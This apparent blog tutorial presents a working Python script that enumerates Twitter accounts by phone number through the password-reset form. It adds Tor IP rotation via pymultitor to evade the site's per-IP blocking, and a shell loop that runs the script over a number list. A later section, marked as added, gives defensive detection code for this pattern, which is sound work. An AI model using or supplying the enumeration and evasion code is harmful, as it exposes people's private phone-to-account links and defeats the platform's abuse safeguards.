Word on the street is that you can just curl /account/begin_password_reset with account_identifier and the response tells you whether there is an account. That is kind of true, but Twitter uses some tokens to check that requests are authentic and also blocks an IP once 7 or more of the same request come from it. So, in true hacker spirit, let’s get around these ‘safeguards’ and enumerate some numbers!

The Plan…

  • Script the browser form filling
  • Send to Twitter and filter out the noise, only show if we have an account
  • If we detect Twitter blocked us, let’s use a new Tor IP

Getting Started

Time to install all the bits we need…

pip install mechanize
pip install bs4
pip install lxml

The Request

This part is simple: we can use mechanize, which is nice for browser automation, to send the right request. What’s nice about this is that mechanize will get all the tokens needed just as a normal user would, so no extra work here.

import sys
import re
from mechanize import Browser
from bs4 import BeautifulSoup

# new browser instance
br = Browser()
# open session in browser
br.open("https://twitter.com/account/begin_password_reset")
# select the first form seen in the HTML response
br.select_form(nr=0)
# fill the field with the first argument to our script (the phone number)
br.form["account_identifier"] = sys.argv[1]
# submit the form
response = br.submit()
# parse the response with lxml and BeautifulSoup
soup = BeautifulSoup(response.read(), "lxml")
# print the text found in the 'PageHeader' section (the result)
for element in soup.find_all(class_='PageHeader'):
    print(element.text)

It works! Nice.

But after ~7 tries we get this…

We will try again, don’t worry about that.

But we are impatient, and time is pwnage so let’s try and solve this issue with PyMultitor, a Python Multi Threaded Tor Proxy (realgam3/pymultitor on GitHub).

We simply add a line to use a proxy. You can also see the commented-out command to run pymultitor: it looks for the error string and, if it is detected, gets a new IP from the Tor network.

twitter-enum.py

import sys
import re
from mechanize import Browser
from bs4 import BeautifulSoup
br = Browser()
#https://github.com/realgam3/pymultitor
#pymultitor --on-string "Please try again later."
br.set_proxies({"http": "127.0.0.1:8080"})

br.open("https://twitter.com/account/begin_password_reset")
br.select_form(nr=0)
br.form["account_identifier"] = sys.argv[1]
response = br.submit() # submit current form
soup = BeautifulSoup(response.read(), "lxml")
for element in soup.find_all(class_='PageHeader'):
    print(element.text)

When it’s all set up, just add the phone numbers to a text file and run this command…

for num in $(cat numlist.txt); do python twitter-enum.py $num; done
  • NOTE: A few Tor-related bugs to iron out, but when I do I will update this post and get this on GitHub. Without IP spoofing, the script works great for targeted OSINT on < 6 targets.
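
Seen from the defender's side, rotating the source address as described above keeps every IP under the per-IP threshold, so detection has to key on something other than the address. The following is an added example, not code from the original post: it assumes a reset-request log with a timestamp, source IP, a client fingerprint field (`ua`) and the submitted identifier, and the log lines, the window, the identifier threshold and all function names are constructed for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

PER_IP_LIMIT = 7                  # per-IP block threshold the post describes
WINDOW = timedelta(minutes=10)    # assumed detection window
MAX_IDS_PER_CLIENT = 10           # assumed: distinct identifiers one client may look up per window

def build_sample_log():
    """Constructed log: one client changing IP every 5 requests, plus two ordinary users."""
    t0 = datetime(2024, 1, 1, 12, 0, 0)
    lines = []
    for i in range(30):
        ts = (t0 + timedelta(seconds=10 * i)).isoformat()
        lines.append(f"{ts} 198.51.100.{i // 5 + 1} ua=client-A id=+1555010{i:04d}")
    lines.append(f"{t0.isoformat()} 203.0.113.9 ua=client-B id=alice@example.com")
    lines.append(f"{(t0 + timedelta(minutes=3)).isoformat()} 203.0.113.10 ua=client-C id=bob@example.com")
    return lines

def parse(line):
    # Assumed format: "<iso-timestamp> <ip> ua=<fingerprint> id=<identifier>"
    ts, ip, ua, ident = line.split(" ", 3)
    return datetime.fromisoformat(ts), ip, ua[3:], ident[3:]

def per_ip_offenders(lines):
    """The per-IP rule alone: IPs with PER_IP_LIMIT or more reset requests."""
    counts = defaultdict(int)
    for line in lines:
        counts[parse(line)[1]] += 1
    return {ip for ip, n in counts.items() if n >= PER_IP_LIMIT}

def enumeration_suspects(lines):
    """Flag fingerprints that query many distinct identifiers inside WINDOW, whatever the IP."""
    events = defaultdict(list)
    for line in lines:
        ts, ip, ua, ident = parse(line)
        events[ua].append((ts, ip, ident))
    suspects = {}
    for ua, evs in events.items():
        evs.sort()
        start = 0
        for end in range(len(evs)):
            while evs[end][0] - evs[start][0] > WINDOW:
                start += 1                      # slide the window forward
            window = evs[start:end + 1]
            ids = {e[2] for e in window}
            if len(ids) > MAX_IDS_PER_CLIENT:   # record the state at first crossing
                suspects[ua] = {"identifiers": len(ids), "ips": len({e[1] for e in window})}
                break
    return suspects
```

The per-IP rule flags nothing on this log, while the fingerprint rule flags the rotating client. Detection of this kind complements, rather than replaces, returning the same reset response whether or not the account exists.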